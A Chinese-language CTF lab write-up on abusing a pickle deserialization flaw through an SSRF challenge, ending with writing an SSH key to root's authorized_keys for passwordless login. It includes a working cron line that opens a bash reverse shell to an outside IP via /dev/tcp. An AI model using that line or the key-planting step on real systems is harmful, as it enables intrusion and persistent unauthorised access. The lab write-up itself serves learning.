目录
一、环境
二、 介绍
三、开始做题
四、写公钥
一、环境
网上自己找
二、 介绍
我们经过前面文章很清楚知道,shiro是将数据存储在内存当中,内存落盘实现一个数据存储,而当其结合python,python将登录的session存储到shiro里面就会造成一个反序列化漏洞
看看环境
登录信息存到session
序列化一个引擎
序列化存入
那我们就需要反序列化的方式取出
pass:python序列化的两个方法pickle.dumps、pickle.loads
三、开始做题
很明显的ssrf题目
接下来就是猜目录,但是这个靶场给了我们利用工具
其实跟我们之前用的工具差不多一样,我们还是一样解码看它干了什么
一模一样正常的反弹shell操作如fiushall等等
攻击机接shell
反馈是okokok我们等一分钟看看情况
很明显反弹回来了
所以我们进入docker环境下看看它的任务计划有没有写成功
但是ubentu和centos的反弹不一样
ubentu是写在这个任务计划目录下的,ubentu的反弹并不稳定,因为其中涉及权限不能是644,得是600,第二个邮件服务器,第三个坑点/bin/sh指向dash,而我们反弹shell是bash
总结一下:
补充另一种方法:
*/1 * * * * bash -c "bash -i >&/dev/tcp/123.207.x.x/1234 0>&1"
不用修改链接指向,直接在sh下执行bash -c。
四、写公钥
脚本上是写到/root/.ssh这个目录下authorized_keys这个文件里面
我这里生成一对公钥和私钥
还是一样用centos去测试,写公钥看一下
很明显它是写入了
我们直接可以免密登录了